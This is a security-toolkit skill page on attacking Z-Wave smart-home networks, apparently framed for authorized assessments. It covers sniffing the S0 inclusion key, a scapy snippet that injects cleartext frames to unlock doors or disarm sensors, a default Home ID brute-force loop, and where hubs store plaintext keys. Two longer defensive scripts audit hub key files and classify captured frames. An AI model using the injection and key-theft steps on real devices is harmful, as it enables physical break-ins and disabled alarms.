From cybersec-toolkit
Analyzes Z-Wave smart home security: S0 key derivation flaw, S2 ECDH commissioning review, replay/injection on unauthenticated nodes, and hub pivots. For authorized security assessments of door locks, sensors, and garage controllers.
Slash command: `/cybersec-toolkit:offensive-z-wave`
Z-Wave runs in the 800/900 MHz ISM band (US: 908 MHz, EU: 868 MHz). Older networks used the S0 security scheme with a fixed-derivation network key — long-known to be flawed. S2 (mandatory for Z-Wave Plus v2 since 2017) uses ECDH commissioning and is significantly stronger.
| Adapter | Use |
|---|---|
| Z-Force (legacy, hard to find) | Original research tool |
| EZ-Wave (custom HackRF firmware) | Modern, full transceiver |
| Aeotec Z-Stick | Commercial controller, useful as legitimate node |
| HackRF + open Z-Wave firmware | Multi-band SDR approach |
| RTL-SDR + ZniffMobile (passive only) | Cheap sniffer |
```bash
# EZ-Wave (HackRF firmware-based)
git clone https://github.com/cureHsu/EZ-Wave
ezwave-sniff -f 908.4MHz -o capture.pcap
# Wireshark with the Z-Wave dissector parses captured frames
wireshark capture.pcap
```
Look for the inclusion phase (controller adding new device) — that's where the network key is exchanged.
S0 derives the network key from a fixed all-zero PSK during the inclusion of the first device. That fixed material is well-known — any S0 network you sniff during inclusion can be decrypted offline.
S0 commissioning:
1. New node joins → controller sends key with zero-PSK encryption
2. Attacker sniffs commissioning frame → derives session key
3. All future S0 traffic on that network is decryptable
If you can capture that inclusion exchange, you own the network key for that mesh.
S2 fixes S0 by using ECDH for commissioning.
S2's attack surface is mostly implementation-level.
Many low-end Z-Wave devices (older sensors, basic switches) don't enforce S0 or S2 — they accept commands in cleartext.
```python
# scapy-zwave (community fork) for crafted frames
from scapy.contrib.zwave import *
frame = ZWave(home_id=0x12345678)/ZWaveBasic(set_value=0xff)
sendp(frame, iface='ezwave0')
```
This unlocks doors / switches lights / unarms sensors when the target lacks authentication.
For old test deployments using default home IDs / network keys:
```bash
# Try default home IDs
for hid in 0x00000000 0x12345678 ...; do
  ezwave-test --home-id $hid --target-node 1
done
```
Hit rate on production is low; useful only for default-config IoT lab gear.
Z-Wave devices are typically controlled by a hub (SmartThings, Hubitat, Vera, Home Assistant, Z-Wave JS UI). The hub is a Linux device with the Z-Wave PSK in plaintext storage:
`~/.homeassistant/zwave_js.json` typically contains keys.

Compromise the hub → walk away with the Z-Wave PSK + every paired device's command authority. See offensive-iot for hub firmware extraction.
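From the defender's side, that plaintext key store is the thing to audit. The script below is an added example written for this page, not part of the cybersec-toolkit skill or of any hub project. It assumes a JSON settings file that keeps the four network keys in a top-level `securityKeys` object, using the key names zwave-js-ui uses (`S0_Legacy`, `S2_Unauthenticated`, `S2_Authenticated`, `S2_AccessControl`); for another hub, adjust `KEY_FIELDS` and the lookup in `audit_hub_keys`. It checks that the file is not group- or world-readable, flags a configured S0 key (legacy nodes whose traffic is decryptable from a captured inclusion), and rejects constant, low-diversity or reused key values. Both sample configs and their key values are constructed for the example.

```python
"""Audit a Z-Wave hub's stored network keys: file exposure, legacy S0 use, weak or reused keys."""
from __future__ import annotations
import json
import os
import stat

# Key names as used by zwave-js-ui (assumption: your hub may name or nest them differently).
KEY_FIELDS = ("S0_Legacy", "S2_Unauthenticated", "S2_Authenticated", "S2_AccessControl")


def key_weaknesses(name: str, hex_key: str) -> list[str]:
    """Return problems with one 128-bit key given as 32 hex characters."""
    try:
        raw = bytes.fromhex(hex_key)
    except ValueError:
        return [f"{name}: not valid hex"]
    problems = []
    if len(raw) != 16:
        problems.append(f"{name}: {len(raw)} bytes, expected 16")
    distinct = len(set(raw))
    if distinct <= 1:
        problems.append(f"{name}: constant byte pattern (e.g. all-zero) is not a random key")
    elif distinct < 6:
        problems.append(f"{name}: very low byte diversity, looks hand-typed rather than random")
    return problems


def audit_hub_keys(config: dict, file_mode: int) -> list[str]:
    """Pure check over a parsed config dict plus the config file's permission bits."""
    findings = []
    if file_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"config readable by group/other (mode {file_mode:04o}); keys are plaintext, "
                        "restrict the file to the hub service user (0600)")
    keys = config.get("securityKeys", {})
    present = {n: keys[n] for n in KEY_FIELDS if keys.get(n)}
    if not present:
        findings.append("no security keys configured: devices will be included without S0/S2")
    if "S0_Legacy" in present:
        findings.append("S0_Legacy key configured: traffic of every S0 node is decryptable by anyone "
                        "who captured its inclusion; plan re-inclusion of those nodes under S2")
    for name, value in present.items():
        findings.extend(key_weaknesses(name, value))
    seen: dict[str, str] = {}
    for name, value in present.items():
        if value.lower() in seen:
            findings.append(f"{name} reuses the value of {seen[value.lower()]}; each security class needs its own key")
        seen.setdefault(value.lower(), name)
    return findings


def audit_hub_key_file(path: str) -> list[str]:
    """Read a real settings file (assumed JSON with a securityKeys object) and run the audit."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8") as fh:
        return audit_hub_keys(json.load(fh), mode)


# Constructed sample configs; key values are made up for this example.
WEAK_CONFIG = {"securityKeys": {
    "S0_Legacy": "00000000000000000000000000000000",
    "S2_Unauthenticated": "0102030405060708090a0b0c0d0e0f10",
    "S2_Authenticated": "0102030405060708090a0b0c0d0e0f10",   # reused value
    "S2_AccessControl": "9f1c4e7b2a6d8e0f3b5c7d9e1f2a4b6c",
}}
HARDENED_CONFIG = {"securityKeys": {
    "S2_Unauthenticated": "3c9b1e7a5d2f8c4b6e0a1d3f5b7c9e2a",
    "S2_Authenticated": "a7d2e94c1b5f8e3d6c0a2b4e8f1d7c39",
    "S2_AccessControl": "5e8a1c3f7b9d2e4a6c0b8f1d3e5a7c92",
}}

if __name__ == "__main__":
    for label, cfg, mode in (("weak", WEAK_CONFIG, 0o644), ("hardened", HARDENED_CONFIG, 0o600)):
        print(label, audit_hub_keys(cfg, mode) or ["no findings"])
```

The weak config produces four findings (world-readable file, S0 key present, all-zero S0 key, reused S2 key); the hardened one produces none. On a live hub, point `audit_hub_key_file` at the settings file and treat any "high"-style finding as a reason to re-key the mesh, since a leaked key cannot be rotated without re-including every node.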
```bash
# 1. Identify region + frequency
# US: 908.4 MHz; EU: 868.4 MHz; CN: 868.4 MHz
# 2. Sniff
ezwave-sniff -f 908.4MHz -o cap.pcap
wireshark cap.pcap # filter zwave
# 3. Identify S0 vs S2 from frame format
# 4. For S0: capture inclusion → derive key → decrypt history + control devices
# 5. For S2: focus on hub compromise / DSK theft / implementation bugs
# 6. Test unauthenticated cleartext devices with crafted frames
```
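Steps 3 and 6 of that checklist, and the S0-versus-cleartext distinction drawn in the sections above, can be scripted over a capture from the defender's side: which nodes are addressed under S2, which still run the legacy S0 scheme, and which receive state-changing commands with no security layer at all. The following is an added example written for this page, not part of the cybersec-toolkit skill or of EZ-Wave. It parses the R1/R2 singlecast MPDU layout (Home ID, source node, two frame-control bytes, length, destination node, command-class payload, 8-bit XOR checksum with seed 0xFF) and keys its classification on the command class byte: `0x9F` for S2, `0x98` for S0, anything else is cleartext. The Home ID, node numbers and frame bytes are constructed sample data; feeding it a real capture would need a pcap reader in front of `audit`, which is not included.

```python
"""Passive audit of captured Z-Wave frames: which nodes are addressed with S2,
which still use S0, and which receive state-changing commands in cleartext."""
from __future__ import annotations
from dataclasses import dataclass

# Command class identifiers from the Z-Wave command class specification.
CC_BASIC, CC_SWITCH_BINARY, CC_DOOR_LOCK = 0x20, 0x25, 0x62
CC_SECURITY, CC_SECURITY_2 = 0x98, 0x9F          # S0 and S2
S0_MESSAGE_ENCAPSULATION = 0x81
S2_MESSAGE_ENCAPSULATION = 0x03
S2_KEX_COMMANDS = {0x04, 0x05, 0x06, 0x08, 0x09, 0x0A}  # KEX Get/Report/Set, Public Key Report, Network Key Get/Report
# Cleartext Set commands that change physical state.
ACTUATOR_SET_COMMANDS = {
    (CC_BASIC, 0x01): "Basic Set",
    (CC_SWITCH_BINARY, 0x01): "Switch Binary Set",
    (CC_DOOR_LOCK, 0x01): "Door Lock Operation Set",
}
HDR_SINGLECAST = 0x01   # low nibble of the first frame-control byte


def xor_checksum(body: bytes) -> int:
    """8-bit XOR checksum of the R1/R2 frame formats: seed 0xFF, XOR every byte before the checksum."""
    ck = 0xFF
    for b in body:
        ck ^= b
    return ck


def build_frame(home_id: int, src: int, dst: int, payload: bytes, seq: int = 1) -> bytes:
    """Assemble a singlecast MPDU: HomeID(4) Src(1) FrameCtl(2) Length(1) Dst(1) payload Checksum(1).
    The Length field counts the whole MPDU including the checksum."""
    length = 10 + len(payload)
    body = home_id.to_bytes(4, "big") + bytes([src, 0x40 | HDR_SINGLECAST, seq & 0x0F, length, dst]) + payload
    return body + bytes([xor_checksum(body)])


@dataclass
class Frame:
    home_id: int
    src: int
    dst: int
    header_type: int
    payload: bytes


def parse_frame(raw: bytes) -> Frame:
    """Parse and verify one raw frame; raise ValueError if length or checksum do not agree."""
    if len(raw) < 10:
        raise ValueError("frame too short")
    if raw[7] != len(raw):
        raise ValueError(f"length field {raw[7]} != actual {len(raw)}")
    if xor_checksum(raw[:-1]) != raw[-1]:
        raise ValueError("checksum mismatch")
    return Frame(int.from_bytes(raw[:4], "big"), raw[4], raw[8], raw[5] & 0x0F, raw[9:-1])


def classify(frame: Frame) -> tuple[str, str | None, str]:
    """Return (security level, finding severity or None, note) for one singlecast frame."""
    p = frame.payload
    if len(p) < 2:
        return "cleartext", None, "no command class payload"
    cc, cmd = p[0], p[1]
    if cc == CC_SECURITY_2:
        if cmd in S2_KEX_COMMANDS:
            return "S2", "info", f"S2 commissioning (key exchange) with node {frame.dst}"
        return "S2", None, ("S2-encapsulated traffic" if cmd == S2_MESSAGE_ENCAPSULATION else f"S2 command 0x{cmd:02x}")
    if cc == CC_SECURITY:
        return "S0", "medium", f"node {frame.dst} still uses S0 (command 0x{cmd:02x}); its network key was delivered under the fixed S0 inclusion key"
    if (cc, cmd) in ACTUATOR_SET_COMMANDS:
        return "cleartext", "high", f"unauthenticated {ACTUATOR_SET_COMMANDS[(cc, cmd)]} sent to node {frame.dst} in cleartext"
    return "cleartext", None, f"cleartext command class 0x{cc:02x}"


def audit(raw_frames: list[bytes], expected_home_id: int) -> dict:
    """Summarise a capture: security levels seen per destination node plus (severity, message) findings."""
    nodes: dict[int, set[str]] = {}
    findings: list[tuple[str, str]] = []
    for i, raw in enumerate(raw_frames):
        try:
            f = parse_frame(raw)
        except ValueError as err:
            findings.append(("warn", f"frame {i}: malformed ({err})"))
            continue
        if f.home_id != expected_home_id:
            findings.append(("warn", f"frame {i}: foreign Home ID 0x{f.home_id:08x} (neighbouring mesh or spoofed traffic)"))
            continue
        if f.header_type != HDR_SINGLECAST:
            continue   # acks and multicast carry nothing this audit needs
        level, severity, note = classify(f)
        nodes.setdefault(f.dst, set()).add(level)
        if severity:
            findings.append((severity, f"frame {i}: {note}"))
    return {"nodes": {n: sorted(v) for n, v in nodes.items()}, "findings": findings}


# Constructed sample capture (Home ID and node numbers are made up for this example).
HOME_ID = 0xC0FFEE01
_bad = build_frame(HOME_ID, 1, 5, bytes([CC_BASIC, 0x01, 0xFF]), seq=7)
SAMPLE_CAPTURE = [
    build_frame(HOME_ID, 1, 5, bytes([CC_BASIC, 0x01, 0xFF]), seq=1),                       # cleartext Basic Set
    build_frame(HOME_ID, 1, 6, bytes([CC_DOOR_LOCK, 0x01, 0x00]), seq=2),                   # cleartext Door Lock Operation Set
    build_frame(HOME_ID, 1, 7, bytes([CC_SECURITY, S0_MESSAGE_ENCAPSULATION]) + bytes(20), seq=3),   # S0 traffic
    build_frame(HOME_ID, 1, 8, bytes([CC_SECURITY_2, 0x06, 0x00, 0x02, 0x01]), seq=4),     # S2 KEX Set
    build_frame(HOME_ID, 1, 9, bytes([CC_SECURITY_2, S2_MESSAGE_ENCAPSULATION]) + bytes(12), seq=5),  # S2 traffic
    build_frame(0xDEADBEEF, 3, 5, bytes([CC_BASIC, 0x01, 0xFF]), seq=6),                   # another mesh's Home ID
    _bad[:-1] + bytes([_bad[-1] ^ 0xFF]),                                                   # corrupted checksum
]

if __name__ == "__main__":
    report = audit(SAMPLE_CAPTURE, HOME_ID)
    for node, levels in sorted(report["nodes"].items()):
        print(f"node {node}: {', '.join(levels)}")
    for severity, msg in report["findings"]:
        print(f"[{severity}] {msg}")
```

Run against your own mesh before and after migrating devices, the report should end up with every actuator node listed as S2 only and no "high" findings; any node that still shows "cleartext" for a lock, switch or alarm command class is one that a replayed or crafted frame could drive, and any node still on S0 should be excluded and re-included under S2 (which also means generating fresh network keys on the hub).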
Install: `npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit`